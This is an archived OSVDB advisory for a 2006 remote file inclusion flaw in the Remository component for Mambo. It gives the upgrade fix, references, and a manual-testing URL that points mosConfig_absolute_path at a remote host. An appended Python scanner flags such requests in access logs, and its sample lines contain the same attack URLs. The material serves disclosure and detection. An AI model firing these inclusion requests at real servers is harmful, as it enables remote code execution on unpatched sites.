Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion

2006-08-10T07:35:23
ID OSVDB:27903
Type osvdb
Reporter OSVDB
Modified 2006-08-10T07:35:23

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?
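A log check for the request pattern in the testing note above, added here as an example that is not part of the OSVDB entry or of Remository's own code: it flags access-log requests to admin.remository.php whose mosConfig_absolute_path value is a URL rather than a local path. The Apache common/combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a common/combined access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT = "/com_remository/admin.remository.php"   # path from the advisory
PARAM = "mosConfig_absolute_path"                 # PHP variable names are case-sensitive
# URL wrappers that make an include path point away from the local filesystem
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data):", re.I)

def flag_line(line):
    """Return the remote value passed in PARAM, or None if the line is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not unquote(parts.path).lower().endswith(SCRIPT):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs decodes once; decode again to catch double-encoded values
        for candidate in (value, unquote(value)):
            if REMOTE_RE.match(candidate):
                return candidate
    return None

def scan(lines):
    """Return (line_number, value) for every flagged line. Only the query
    string is visible in an access log; POST bodies and cookies are not."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = flag_line(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2006:07:40:01 +0000] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Aug/2006:07:41:13 +0000] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2006:07:42:30 +0000] "GET /index.php?option=com_remository&Itemid=5 HTTP/1.1" 200 8120',
    '198.51.100.8 - - [10/Aug/2006:07:43:02 +0000] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: remote include path {value!r}")
```

A hit shows that the request was made, not that the include succeeded; that still depends on register_globals being on and on the installed version.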

References:

Vendor URL: http://www.remository.com/
Secunia Advisory ID: 21477
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html
FrSIRT Advisory: ADV-2006-3270
CVE-2006-4130
Bugtraq ID: 19465